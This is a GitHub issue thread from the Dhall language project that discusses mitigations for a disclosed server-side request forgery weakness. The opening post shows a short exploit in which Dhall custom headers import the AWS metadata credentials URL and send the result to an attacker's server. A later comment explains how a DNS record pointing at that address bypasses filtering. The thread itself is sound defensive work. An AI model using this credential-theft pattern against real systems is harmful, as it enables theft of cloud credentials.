### ISSUE TITLE
Discuss: Solutions to protect against server-side request forgery

### ISSUE THREAD

**Issue by Gabriel439** [dhall-lang/dhall-lang#404]
@sarneaud pointed out in https://github.com/dhall-lang/dhall-lang/issues/333#issuecomment-469442937 that Dhall is vulnerable to [server-side request forgery](https://www.owasp.org/index.php/Server_Side_Request_Forgery).  The simplest exploit is:

* `https://example.com/malicious` imports `https://example.com/recordsHeaders using https://example.com/stealCredentials`
* `https://example.com/stealCredentials` contains

  ```haskell
  [ { header = "Credentials"
    , value = http://169.254.169.254/latest/meta-data/iam/security-credentials/role as Text
    }
  ]
  ```

The topic for this issue is to discuss possible solutions to this vulnerability.  I will post my own thoughts in a follow-up comment.

**Comment by Gabriel439** [comment]
This can be partially mitigated by changing the referential sanity check to detect that [private/link-local CIDR blocks](https://en.wikipedia.org/wiki/Private_network) (such as `169.254.0.0/16`) are not globally addressable, which would have prevented this specific example exploit.  The [referential sanity check](https://github.com/dhall-lang/dhall-lang/blob/master/standard/semantics.md#referential-sanity-check) was created exactly for this purpose: to detect and prevent globally addressable (such as `https://example.com`) from importing non-globally-addressable imports.

That's not complete protection, because it doesn't detect against attacks where the attacker refers to a private address via a DNS address instead of an IP address.  We can also detect and treat certain reserved domain names (such as `localhost` or `10.in-addr.arpa`) as non-globally addressable to further mitigate the problem, but this is also not a complete prevention.

You might wonder if this could be prevented by providing the option to disable language support for custom headers, but that would still leave Dhall open to a [cross-site request forgery](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) attack where an external URL attempted to import from a misconfigured internal server where a `GET` request was not safe (i.e. a `GET` request deletes the identified resource, don't ask me why).  This is why I believe we should focus on fixing this via the referential sanity check rather than restricting Dhall's support for custom headers.

So with that background in mind, here are the main alternatives I can think of:

* **Approach 1**: Apply partial mitigations to treat private/reserved/link-local CIDR blocks and domain names as non-globally addressable in the referential sanity check

  I think this is a good idea no matter what since there is basically no downside (other than slightly increasing the complexity of the standard)

* **Approach 2**: Same as Approach 1, but allow the user to specify additional domains and IP addresses as non-globally addressable

  I'm not sure exactly what the interface for this would look like, but if desired this would be a good topic for discussion in this thread.

  This is essentially a "blacklist" approach to identifying which domains/IPs that remote imports can transitive import

* **Approach 3**: Same as Approach 1, but allow the user to explicitly enumerate which IP addresses and domains are globally addressable

  This is essentially the same as Approach 2 except it is a "whitelist" instead of a blacklist.

**Comment by ari-becker** [comment]
I think it would be better to introduce some kind of keyword that instructs the parser to error in case the following expression contains networked / remote imports, e.g. `no-remote`.

For example, imagine that `https://example.com/example.dhall` resolves to `{hello = "world"}`:
`no-remote {hello = "world"}` normalizes to `{hello = "world"}`
`no-remote https://example.com/example.dhall` results in `Error: attempted to resolve remote import within a no-remote block: https://example.com/example.dhall`.

This allows the developer to accept user input by wrapping the user input in a `no-remote` block, and completely avoiding the issue.

With approach 1, you risk running into bugs where users with non-standard networking setups are attempting a valid approach and are trapped by the language not respecting their non-standard setup. It sounds unlikely, but the larger language adoption gets, the more likely it will be an issue for somebody.

Approach 2 doesn't solve the issue because it makes the language default-insecure (since most users will be unaware of what to blacklist).

Approach 3 is basically an extension of my recommendation, instead of `no-remote https://example.com/example.dhall` there would be `https://example.com/example.dhall permit-remote [] : List Text` to trigger the error, and `https://example.com/example.dhall permit-remote ["example.com"]` to successfully normalize to `{hello = "world"}` in cases where specific domains are known as desirable. Depending on the threat model, this may or may not be acceptable - for example, imagine that valid Dhall expressions are available on "example.com/dhall/...`, and that none of these expressions are malicious. By permitting `permit-remote ["example.com"]`, the developer permits the user to import from `["example.com/sensitive/..."]`. This is only an issue when the developer does not have complete control over `example.com`, and indeed the developer may not care if the user succeeds at leaking from a `example.com` which the developer does not own or control, but it's still technically a SSRF attack.

**Comment by Nadrieril** [comment]
How about we use the systems that already exist to prevent these sorts of issues: [same-origin policy](https://en.wikipedia.org/wiki/Same-origin_policy) and [CORS](https://en.wikipedia.org/wiki/Cross-origin_resource_sharing#Simple_example).
The basic idea is that a remote file would by default only be allowed to reference other remote files on the same server. If `example.com/a.dhall` references `otherdomain.com/b.dhall`, dhall would refuse to proceed EXCEPT if an OPTION request to `otherdomain.com/b.dhall` returns a specific header allowing `example.com` to reference the file.
Since this is the mechanism used by browsers, running dhall to query a remote file would not introduce any more vulnerabilities than running a web browser to view a remote webpage. So there would be no need for additionnal white-/blacklisting from dhall.

**Comment by ari-becker** [comment]
Well, CORS is basically a variant on domain/IP whitelisting, it just moves the whitelist from the importing expression to the server which hosts the expression to be imported. That means that the importing expression may not be portable anymore, i.e. that the importing expression may successfully resolve in one environment and fail to resolve in another (if the `OPTION` request doesn't permit the server to which the importing expression has been migrated to).

I leave it to the maintainers whether that's acceptable.

**Comment by Nadrieril** [comment]
Hmm, you're right that that could be problematic for hosting solutions that do not emit CORS headers... I had a look, and raw.githubusercontent does, but for example pastebin doesn't. That may be too restrictive then

**Comment by Gabriel439** [comment]
Actually, I think CORS is a good solution.

Note that `prelude.dhall-lang.org` already does support CORS, which would address the most common use case for transitive imports (you depend on a remote Dhall expression on GitHub that transitively depends on the Prelude).

Also, there is an idea I mentioned in a separate issue of creating a convenient proxy that automatically normalizes Dhall expressions and the same proxy could also support CORS headers.  It would be really easy to implement and provide convenient cross-platform installers just like we already do for the Haskell interpreter.

**Comment by Nadrieril** [comment]
Since we're considering proxies, for the record there is https://cors.io that adds CORS headers.

**Comment by Gabriel439** [comment]
Whoops, forgot the link: https://github.com/dhall-lang/dhall-lang/issues/322#issuecomment-447660716

**Comment by sarneaud** [comment]
Any filtering approach needs to consider that it's trivial for someone to register DNS A and CNAME records.  For example, there's nothing stopping me registering `warmfuzzydomain.example.com`, making it point to `169.254.169.254`, and then using `http://warmfuzzydomain.example.com/latest/meta-data/iam/security-credentials/role` in my exploit.  You could try to make the filtering smart enough to detect that, but it's simpler to use a whitelist approach.

CORS might be a good idea, but there's still the problem of an untrusted file processed on a server having access to both internal URLs and external URLs.

The XML external entities thing I linked to in https://github.com/dhall-lang/dhall-lang/issues/333#issuecomment-469442937 is practically the exact equivalent issue for XML.  Most people work around it by using an XML parser that has the option to disable network requests or external entities.  A whitelist option (where an empty whitelist effectively disables all network support) would do the job for Dhall.

**Comment by Gabriel439** [comment]
@sarneaud: Could you expand on what you mean by:

> there's still the problem of an untrusted file processed on a server having access to both internal URLs and external URLs.

**Comment by sarneaud** [comment]
Have a look at this example: https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/  It's for a web application that accepted SVG images from untrusted users and rendered them as raster images.  The same problem would happen if SVG were based on Dhall instead of XML.  CORS wouldn't help in this case, either.

There are plenty more examples of the same kind of attack scenario.  Here's one for the Inkscape vector graphics program: https://bugs.launchpad.net/inkscape/+bug/1025185  Pretty much, we're talking about any scenario where 1) XML is used as the basis of a file format, 2) programs process files from untrusted sources, and 3) external entities (imports) aren't restricted.

**Comment by Gabriel439** [comment]
@sarneaud: So I think that latter problem would be addressed by the standard requiring that any service that serves an interpreted Dhall expression do so by setting the root import to the address it binds to.

Then the referential sanity check would do "the right thing":

* (A) if the service binds to a referentially transparent (i.e. public) address then that would prevent the service from importing local files and environment variables
* (B) if the service binds to a referentially opaque (i.e. private) address (i.e. `127.0.0.1`) then that would permit the service to import local files and environment variables

Note that currently the standard provides no guidance on how to select the root import that import resolution requires (See: [Import resolution judgment](https://github.com/dhall-lang/dhall-lang/blob/master/standard/semantics.md#import-resolution-judgment)).  It technically only specifies that you cannot resolve any imports unless you provide with a non-empty history of imports to begin from, but it doesn't specify what root import to use to seed that non-empty history.

So, to summarize: I believe the correct fix to the latter problem you described is to update the standard to give guidance on how to select the initial root import.  Specifically:

* Use the server's bind address as the root import if a server is interpreting the expression
* Use `./.` for command-line utilities (which implies that they can initially import anything)

**Comment by sarneaud** [comment]
That sounds reasonable.  The most important thing is that the docs and APIs make it clear that this is a thing, and that applications using Dhall with untrusted input have to design for it.

**Comment by Gabriel439** [comment]
The proposal for CORS support is up here: https://github.com/dhall-lang/dhall-lang/pull/411
